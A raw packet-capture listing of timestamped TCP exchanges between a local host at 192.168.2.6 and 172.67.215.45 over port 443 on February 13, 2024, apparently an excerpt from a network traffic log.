Feb 13, 2024 21:13:54.868444920 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.868506908 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.868525982 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.868560076 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.868566990 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.868591070 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.868591070 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.869628906 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.869648933 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.869704008 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.869704008 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.869710922 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.869757891 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.869910002 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.869924068 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.869972944 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.869972944 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.869980097 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.870026112 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.870682955 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.870702982 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.870755911 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.870755911 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.870762110 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.871093035 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.871696949 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.871712923 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.871763945 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.871763945 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.871769905 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.871865034 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.872622013 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.872637033 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.872678995 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.872695923 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.872697115 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.872704029 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.872754097 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.872754097 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.873406887 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.873421907 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.873461962 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.873467922 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.873498917 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.874316931 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.874334097 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.874392986 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.874392986 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.874401093 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.875228882 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.875241995 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.875308990 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.875308990 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.875317097 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.875325918 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.875349045 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.875386000 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.875386000 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.875392914 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.875607014 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.876199961 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.876214027 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.876260996 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.876269102 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.876310110 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.877212048 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.877228975 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.877279997 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.877279997 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.877286911 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.878467083 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.878480911 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.878530025 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.878530025 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.878536940 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.879622936 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.879641056 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.879687071 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.879687071 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.879693985 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.879878044 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.879893064 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.879945993 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.879945993 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.879952908 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.883239031 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.883258104 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.883307934 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.883321047 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.883332968 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.883744001 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.883759022 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.883788109 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.883793116 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.883826971 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.884754896 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.884773970 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.884819031 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.884819031 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.884826899 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.884993076 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.885006905 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.885051966 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.885051966 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.885059118 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.885845900 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.885865927 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.885901928 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.885910988 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.885925055 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.886622906 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.886637926 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.886676073 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.886682034 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.886708021 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.888181925 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.888201952 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.888254881 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.888254881 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.888262033 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.888484001 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.888499022 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.888634920 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.888642073 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.889769077 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.889787912 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.889820099 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.889826059 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.889903069 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.890742064 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.890755892 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.890810013 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.890815973 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.890845060 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.892455101 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.892473936 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.892535925 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.892535925 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.892544031 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.892707109 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.892723083 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.892780066 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.892780066 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.892786980 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.893414021 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.893433094 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.893479109 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.893485069 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.893527031 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.895104885 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.895122051 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.895158052 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.895164013 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.895251036 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.896465063 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.896483898 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.896533012 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.896545887 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.896652937 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.896667004 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.896776915 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.897393942 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.897411108 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.897464991 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.897471905 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.897486925 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.897595882 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.898825884 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.898849964 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.898886919 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.898897886 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.898916960 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.898937941 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.899678946 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.899714947 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.899755001 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.899761915 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.899766922 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.899775982 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.899784088 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.899806023 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.899832964 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.899837017 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.899874926 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.899874926 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.900814056 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.900826931 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.900883913 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.900883913 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.900892019 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.900976896 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.901587009 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.901608944 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.901649952 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.901655912 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.901673079 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.901731014 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.902854919 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.902869940 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.902925014 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.902930975 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.902930975 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.902945042 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.903006077 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.903014898 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.903048992 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.903093100 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.903093100 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.903947115 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.903959990 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.904017925 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.904017925 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.904025078 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.904072046 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.904937983 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.904958963 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.904998064 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.905004978 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.905031919 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.905075073 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.906100988 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.906124115 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.906164885 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.906172037 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.906207085 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.906207085 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.906398058 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.906410933 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.906450033 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.906455994 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.906483889 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.906500101 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.906758070 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.906774044 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.906841993 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.906841993 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.906850100 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.906894922 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.908157110 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.908174038 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.908217907 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.908224106 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.908262014 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.908262014 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.909167051 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.909181118 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.909228086 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.909235954 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.909248114 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.909256935 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.909269094 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.909275055 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.909290075 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.909336090 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.909336090 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.909955025 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.909967899 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.910007954 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.910013914 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.910053015 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.910053015 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.911230087 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.911245108 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.911293030 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.911300898 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.911338091 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.911338091 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.912118912 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.912133932 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.912179947 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.912188053 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.912204981 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.912235022 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.912431002 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.912446022 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.912494898 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.912503004 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.912539005 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.912539005 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.913470030 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.913484097 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.913527012 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.913532972 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.913546085 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.913578033 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.914304972 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.914324045 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.914360046 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.914366961 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.914400101 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.914400101 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.915400028 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.915415049 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.915463924 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.915463924 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.915472031 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.915481091 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.915502071 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.915514946 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.915561914 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.915561914 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.916531086 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.916547060 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.916579008 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.916587114 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.916603088 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.916697025 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.917288065 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.917303085 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.917330980 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.917351007 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.917381048 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.917381048 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.918716908 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.918732882 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.918785095 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.918792963 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.918832064 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.919002056 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.919015884 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.919066906 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.919075966 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.919120073 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.919275999 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.919290066 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.919322968 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.919329882 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.919358969 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.919358969 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.920878887 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.920896053 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.920936108 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.920943022 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.921416998 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.921648979 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.921664953 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.921705008 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.921719074 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.921756983 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.922195911 CET	443	49701	172.67.215.45	192.168.2.6
